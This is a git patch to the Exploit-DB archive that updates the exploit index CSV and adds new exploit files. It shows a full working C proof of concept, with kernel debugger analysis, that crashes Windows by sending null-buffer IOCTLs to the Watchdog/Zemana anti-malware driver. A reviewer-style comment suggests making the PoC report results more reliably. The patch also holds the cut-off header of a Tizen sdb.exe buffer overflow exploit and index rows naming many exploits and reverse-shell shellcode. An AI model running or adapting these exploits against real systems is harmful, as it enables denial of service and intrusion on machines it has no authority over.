From b4050a4e4b30e701b994cb42e50477bf36e77448 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 28 Oct 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-10-28 3 new exploits Boloto Media Player 1.0.0.9 - pls file Denial of Service Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC) HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC) id software quake ii server 3.2 - Multiple Vulnerabilities ID Software Quake II Server 3.2 - Multiple Vulnerabilities Couchdb 1.5.0 - uuids Denial of Service Couchdb 1.5.0 - 'uuids' Denial of Service Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC) Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion) Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion) Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation MinaliC WebServer 1.0 - Remote Source Disclosure/File Download MinaliC WebServer 1.0 - Remote Source Disclosure / File Download PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit) PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit) ISC BIND 8.1 - host Remote Buffer Overflow ISC BIND 8.1 - Host Remote Buffer Overflow Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution RunCMS 1.6 - Blind SQL Injection (IDS evasion) RunCMS 1.6 - Blind SQL Injection (IDS Evasion) glFusion 1.1.2 - COM_applyFilter()/order SQL Injection glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection 
Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection --- files.csv | 31 +++--- platforms/windows/dos/43058.c | 141 ++++++++++++++++++++++++ platforms/windows/dos/43060.py | 176 ++++++++++++++++++++++++++++++ platforms/windows/remote/43059.py | 79 ++++++++++++++ 4 files changed, 413 insertions(+), 14 deletions(-) create mode 100755 platforms/windows/dos/43058.c create mode 100755 platforms/windows/dos/43060.py create mode 100755 platforms/windows/remote/43059.py diff --git a/files.csv b/files.csv index f4faa7e78..977d2f661 100644 --- a/files.csv +++ b/files.csv @@ -1223,7 +1223,7 @@ id,file,description,date,author,platform,type,port 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 -9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 +9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110 
@@ -1506,7 +1506,7 @@ id,file,description,date,author,platform,type,port 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12294,platforms/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos,0 -12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 +12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0 
@@ -3261,7 +3261,7 @@ id,file,description,date,author,platform,type,port 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 -24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 +24710,platforms/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0 
@@ -4095,7 +4095,7 @@ id,file,description,date,author,platform,type,port 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0 -32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0 +32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 
@@ -5721,6 +5721,8 @@ id,file,description,date,author,platform,type,port
 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0
 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0
 43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
+43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
+43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -6236,7 +6238,7 @@ id,file,description,date,author,platform,type,port 4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,multiple,local,0 -4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 +4572,platforms/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,multiple,local,0 4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0 
@@ -6305,7 +6307,7 @@ id,file,description,date,author,platform,type,port 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0 6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0 -6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0 +6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0 6994,platforms/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0 7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0 
@@ -10935,7 +10937,7 @@ id,file,description,date,author,platform,type,port 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0 15333,platforms/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0 -15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 +15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,windows,remote,0 15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 
@@ -11697,7 +11699,7 @@ id,file,description,date,author,platform,type,port 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 -17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 +17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0 
@@ -12305,7 +12307,7 @@ id,file,description,date,author,platform,type,port 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0 -20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 +20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0 
@@ -14773,7 +14775,7 @@ id,file,description,date,author,platform,type,port 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 -33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 +33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 
@@ -15927,6 +15929,7 @@ id,file,description,date,author,platform,type,port
 43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743
 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
+43059,platforms/windows/remote/43059.py,"DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -18968,7 +18971,7 @@ id,file,description,date,author,platform,type,port 4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0 4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0 -4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 +4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,php,webapps,0 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 
@@ -21556,7 +21559,7 @@ id,file,description,date,author,platform,type,port 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0 -8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 +8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0 
@@ -21577,7 +21580,7 @@ id,file,description,date,author,platform,type,port 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0 8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0 8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 -8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 +8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0 
@@ -21632,7 +21635,7 @@ id,file,description,date,author,platform,type,port
 8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0
 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
-8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
+8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
diff --git a/platforms/windows/dos/43058.c b/platforms/windows/dos/43058.c
new file mode 100755
index 000000000..80576162e
--- /dev/null
+++ b/platforms/windows/dos/43058.c
@@ -0,0 +1,141 @@ +/* + +Exploit Title - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference +Date - 26th October 2017 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - https://www.watchdogdevelopment.com/ +Tested Version - 2.74.186.150 +Driver Version - 2.21.63 - zam32.sys +Tested on OS - 32bit Windows 7 SP1 +CVE IDs - CVE-2017-15920 and CVE-2017-15921 +Vendor fix url - Will be fixed in a future release +Fixed Version - n/a +Fixed driver ver - n/a + + + +A null pointer dereference vulnerability is triggered when sending an operation +to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or +the input buffer size being 0 as they are not validated. + +kd> dt nt!_irp @esi -r + +0x000 Type : 0n6 + +0x002 Size : 0x94 + +0x004 MdlAddress : (null) + +0x008 Flags : 0x60000 + +0x00c AssociatedIrp : + +0x000 MasterIrp : (null) + +0x000 IrpCount : 0n0 + +0x000 SystemBuffer : (null) <----------- null pointer + + +0x80002010 +---------- +CVE-2017-15921 + +kd> r +eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 +eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +zam32+0xdd9f: +9087cd9f ff30 push dword ptr [eax] ds:0023:00000000=???????? 
+ + +.text:90AD9104 push offset aIoctl_register ; "IOCTL_REGISTER_PROCESS" +.text:90AD9109 push 0 +.text:90AD910B push edx ; Pointer to "DeviceIoControlHandler" string +.text:90AD910C push 208h +.text:90AD9111 push offset aMain_c +.text:90AD9116 push 1 +.text:90AD9118 call sub_90AD3ADA +.text:90AD911D add esp, 18h +.text:90AD9120 push esi ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer" +.text:90AD9121 call sub_90AD8D90 + +.text:90AD8D90 sub_90AD8D90 proc near +.text:90AD8D90 +.text:90AD8D90 arg_0 = dword ptr 8 +.text:90AD8D90 +.text:90AD8D90 push ebp +.text:90AD8D91 mov ebp, esp +.text:90AD8D93 call sub_90AD414A +.text:90AD8D98 test eax, eax +.text:90AD8D9A jz short loc_90AD8DA6 +.text:90AD8D9C mov eax, [ebp+arg_0] ; Null pointer dereference +.text:90AD8D9F push dword ptr [eax] ; BSOD !!!! +.text:90AD8DA1 call sub_90AD428C +.text:90AD8DA6 +.text:90AD8DA6 loc_90AD8DA6: +.text:90AD8DA6 pop ebp +.text:90AD8DA7 retn 4 +.text:90AD8DA7 sub_90AD8D90 endp +.text:90AD8DA7 +.text:90AD8DAA + + +0x80002054 +---------- +CVE-2017-15920 + +kd> r +eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 +eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +zam32+0xe41a: +9087d41a c7061e010000 mov dword ptr [esi],11Eh ds:0023:00000000=???????? + + +.text:90AD9401 push offset aIoctl_get_driv ; IOCTL_GET_DRIVER_PROTOCOL +.text:90AD9406 push 0 +.text:90AD9408 push edx +.text:90AD9409 push 2A3h +.text:90AD940E push offset aMain_c +.text:90AD9413 push 1 +.text:90AD9415 call sub_90AD3ADA +.text:90AD941A mov dword ptr [esi], 11Eh ; BSOD !!!! 
Null pointer dereference otherwise would point to our input "SystemBuffer" +.text:90AD9420 jmp loc_90AD9622 + + +*/ + + +#include +#include + +int main(int argc, char *argv[]) +{ + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + + + sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + printf("\n[~] Press any key to continue . . ."); + getch(); + + DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL); +// DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL); + + printf("\n[+] DoSed\n\n"); + + CloseHandle(hDevice); + return 0; +} + + + + + diff --git a/platforms/windows/dos/43060.py b/platforms/windows/dos/43060.py new file mode 100755 index 000000000..f34bd53ec --- /dev/null +++ b/platforms/windows/dos/43060.py 
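Review bot: The return value of `DeviceIoControl` in `main` is discarded, so the program prints `[+] DoSed` whether or not the driver accepted the request; on a driver build that validates `SystemBuffer` and the input length (the fix the header says is pending for CVE-2017-15920 / CVE-2017-15921) the PoC would report success while nothing happened. Capture the result so the file can double as a regression check for the vendor fix: `BOOL ok = DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);` followed by `printf("\n[%s] ioctl returned %d, GetLastError=%lu\n", ok ? "+" : "-", ok, GetLastError());`. The two `#include` lines appear with no header name — most likely the angle-bracketed names (`<windows.h>`, `<stdio.h>`; `getch()` additionally needs `<conio.h>`) were stripped during rendering rather than missing from the committed file, but the repository copy is worth checking since the file cannot compile as shown here.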
@@ -0,0 +1,176 @@ +# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC +# Date: 22.10.17 +# Exploit Author: Marcin Kopec +# Vendor Homepage: https://developer.tizen.org/ +# Software Link: https://developer.tizen.org/development/tizen-studio/download# +# Version: 2.3.0, 2.3.2 (some older versions are affected as well) +# Tested on: Microsoft Windows [Version 10.0.16299.19] +# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package): +# e88de99ee069412b7612d85c00aa62fc sdb.exe +# 2.3.0: +# f9fd3896195900ec604c6f182a411e18 sdb.exe +# The file can be located in "tools" subdirectory after the extraction + +# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless +# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious + +# Vulnerability Discovery History +# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249) +# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project +# 29/Jul/16 - Moved the 